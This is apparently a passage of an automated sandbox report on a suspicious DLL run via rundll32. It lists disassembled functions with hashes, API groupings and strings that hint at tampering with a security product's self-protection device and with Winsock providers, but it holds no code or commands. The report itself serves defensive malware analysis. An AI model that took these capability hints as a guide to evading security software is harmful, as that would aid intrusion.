                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2337826640-0
                                                                                                  • Opcode ID: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
                                                                                                  • Instruction ID: 33d5259c6290a7581a5ad5f3dc980324b092c5f168283266ec493f33f9dd72fa
                                                                                                  • Opcode Fuzzy Hash: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
                                                                                                  • Instruction Fuzzy Hash: BB111632601A49CAEB869F21EC543E82360FB4CBD5F19D525BA190B6A5DF34C75DC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180064040 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3341692771-0
                                                                                                  • Opcode ID: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
                                                                                                  • Instruction ID: c87333ac7bcb44b69379473da2adcf9225e28ba0b3bfb3a3c4204cf647e2c29f
                                                                                                  • Opcode Fuzzy Hash: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
                                                                                                  • Instruction Fuzzy Hash: B5110337612B08C6FB96DF64D8583682360FB5DFA9F258704DA6B49599CF38C64DC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180018E8C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                  • String ID: L "$\\.\360SelfProtection
                                                                                                  • API String ID: 3778458602-907869749
                                                                                                  • Opcode ID: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
                                                                                                  • Instruction ID: 4989c80b025c73f727db9230e342af37d309858987cbaecb77f10a65d22bbdba
                                                                                                  • Opcode Fuzzy Hash: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
                                                                                                  • Instruction Fuzzy Hash: F6111C32618B84D7C7518F64F88478AB7A0F78C7A4F444725E6AA43B68EF78C65CCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800184B8 Relevance: 9.3, APIs: 6, Instructions: 270COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 652292005-0
                                                                                                  • Opcode ID: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
                                                                                                  • Instruction ID: 16cab60fb696caa1ac382d07db4514fcd7f2788f0d4e97422f2d8c76aa010f09
                                                                                                  • Opcode Fuzzy Hash: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
                                                                                                  • Instruction Fuzzy Hash: 95C14A32B00B449AEB61CFA1E8407DD33B6F748798F548125EE9967B98DF34C62AD344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180004D74 Relevance: 9.2, APIs: 6, Instructions: 219COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$_errnomemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3323953840-0
                                                                                                  • Opcode ID: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
                                                                                                  • Instruction ID: 824f22201ec0d57d4a2227744580b71807502b4fbd2fda829f419a9b6e1dff6e
                                                                                                  • Opcode Fuzzy Hash: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
                                                                                                  • Instruction Fuzzy Hash: CF810572701A4881EAA6DB14A4447AE77A0FB4CBE4F15C215FFAE4B7D4DE38C6498704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180013600 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 203COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: combo$mid$product
                                                                                                  • API String ID: 0-992679775
                                                                                                  • Opcode ID: e5130312c800340fa7b9c4fc8fca0e2c09fb1440a4f1e916ae566225171d111c
                                                                                                  • Instruction ID: c8dbd6f08156355df5cc37560490d906f7b4f661c1b1c18742a1636a8474de34
                                                                                                  • Opcode Fuzzy Hash: e5130312c800340fa7b9c4fc8fca0e2c09fb1440a4f1e916ae566225171d111c
                                                                                                  • Instruction Fuzzy Hash: C191BB32600E48A5EB92DB60C4423DD27B0F748BD8F949226FA5D57A96DF74C78EC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800505E0 Relevance: 9.2, APIs: 6, Instructions: 196networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Deinstall$ProviderProvider32$CleanupStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 348239931-0
                                                                                                  • Opcode ID: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
                                                                                                  • Instruction ID: c360e4d789f3669f84b45de69cf2c2640493478b51e108b497c61621dba60db4
                                                                                                  • Opcode Fuzzy Hash: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
                                                                                                  • Instruction Fuzzy Hash: 48910332604A88C6EB92CB65E4547EE77A4F78C7E4F618111FA8D276A4DF39C649CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180032E5C Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
                                                                                                  • Instruction ID: 472ff7a9124bb4c66568a88574ce92508997c8508967d0cb70e73e2f7ddd2399
                                                                                                  • Opcode Fuzzy Hash: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
                                                                                                  • Instruction Fuzzy Hash: B951BD32701A4886EB46DF65D8403AD73B0FB49BE4F098621EB2957BE9DF38C959C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180034178 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                                                  • Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
                                                                                                  • Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                                                  • Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800322A0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                                                  • Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
                                                                                                  • Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                                                  • Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003288C Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2343307612-0
                                                                                                  • Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                                                  • Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
                                                                                                  • Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                                                  • Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003339C Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: cb084eac3c01a6141e65883699959179503f168564c67b856e8c6732f0b58ade
                                                                                                  • Instruction ID: 4743fcfbcc81e14f62b6d6540fd80bf8f8ac016693e437fee6067cb5d2a84381
                                                                                                  • Opcode Fuzzy Hash: cb084eac3c01a6141e65883699959179503f168564c67b856e8c6732f0b58ade
                                                                                                  • Instruction Fuzzy Hash: FE517E32701B4882EB469F65D85139E73A0FB49FE4F098225EB694B7E9DF38C549C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800336D0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 195827-0
                                                                                                  • Opcode ID: c7e1832e4ce232530478fafb890d9703e0e225edfd70dbae23375beabdc7b3ab
                                                                                                  • Instruction ID: be5d86e730b1b0d67e88d66128df24a62b98fea8a3ed06798233462d938dce2e
                                                                                                  • Opcode Fuzzy Hash: c7e1832e4ce232530478fafb890d9703e0e225edfd70dbae23375beabdc7b3ab
                                                                                                  • Instruction Fuzzy Hash: E7518E72701B4882EB429F65D85139E73A0FB49FE4F098225EB295B7E9DF38C549C380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180026754 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 142stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpimemset
                                                                                                  • String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
                                                                                                  • API String ID: 3784069311-1340094651
                                                                                                  • Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                                                  • Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
                                                                                                  • Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                                                  • Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800503B8 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                                                  • String ID:
                                                                                                  • API String ID: 3103530258-0
                                                                                                  • Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                                                  • Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
                                                                                                  • Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                                                  • Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800535E4 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                                                  • String ID:
                                                                                                  • API String ID: 3103530258-0
                                                                                                  • Opcode ID: fcf2df2db5cf5e266654a243a60d583c694b8e2f7e43b235741d210c56c3b519
                                                                                                  • Instruction ID: d4c98c1f2c6f443ab10be6318f00d39910fcbf62874244d53b77e7d0f65f3854
                                                                                                  • Opcode Fuzzy Hash: fcf2df2db5cf5e266654a243a60d583c694b8e2f7e43b235741d210c56c3b519
                                                                                                  • Instruction Fuzzy Hash: E651BE72715A4886EB92CF39D8803DD7760F789BE8F449211FA69177A9CF39C64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003775C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 124stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: strchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 2830005266-178107231
                                                                                                  • Opcode ID: bc05744aff8b0383f5567bccd8194249036b1c2b3c5ae3525c55af492ab48238
                                                                                                  • Instruction ID: 65c5a2eb1091ab38a88c8a4afef7a6f5d28e655ba382c7d64d3166a1cd56c67f
                                                                                                  • Opcode Fuzzy Hash: bc05744aff8b0383f5567bccd8194249036b1c2b3c5ae3525c55af492ab48238
                                                                                                  • Instruction Fuzzy Hash: E741C33174568C80FFB78F2594483EA6791A75DFE8F5AD620E96E037C6DE2C864AC301
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180066808 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
